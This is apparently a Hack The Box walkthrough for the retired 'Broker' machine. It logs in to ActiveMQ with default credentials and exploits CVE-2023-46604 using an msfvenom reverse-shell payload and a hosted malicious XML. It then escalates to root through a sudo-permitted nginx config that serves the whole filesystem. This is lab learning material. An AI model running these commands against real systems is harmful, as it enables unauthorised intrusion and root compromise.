Broker

This is a retired Linux box from Hack The Box.

Date : 21 Dec 2023 Thursday

Table of Content

1. Recon
2. Shell as activemq
3. Privilege escalation

Recon

Nmap

nmap --min-rate 1000 -p- -Pn 10.129.230.87 -oN nmap_tcp.txt

Output :

So we can see different ports are open on the machine lets start with port 80.

so we can see here ActiveMQ is running lets check the version

Visiting /admin endpoint

Trying with default credentials

Username: Admin
Password : Admin

It worked

we can see the version of the activemq that is 5.15.15

Shell as activemq

Upon Searching for exploit related to this version i came across this repo:

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

By following the instruction we can easily get the shell :

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ.git

msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf

python3 -m http.server

Edit the file poc-linux.xml and adress for the poc-linux.xml

go run main.go -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:$RPORT/poc-linux.xml

Privilege escalation

sudo -l

we can execute the nginx with root privileges so let’s start a web server which give is root access to the server on which it is running

cat /etc/nginx/nginx.conf | grep -v "/#"

cat /etc/nginx/sites-enabled/default

make a file on your system

nano nginx.conf

user root;
worker_processes auto;
pid /run/nginx2.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
  worker_connections 768;
}

http {
  server {
        listen 1337;
        location / {
          root /;
        }

      }
}

start python server

python -m http.server

Download it on the machine in the /dev/shm directory

wget http://$RHOST:8000/nginx.conf

start the server

sudo nginx -c /dev/shm/nginx.conf

download the flag :

 curl http://localhost:1337/root/root.txt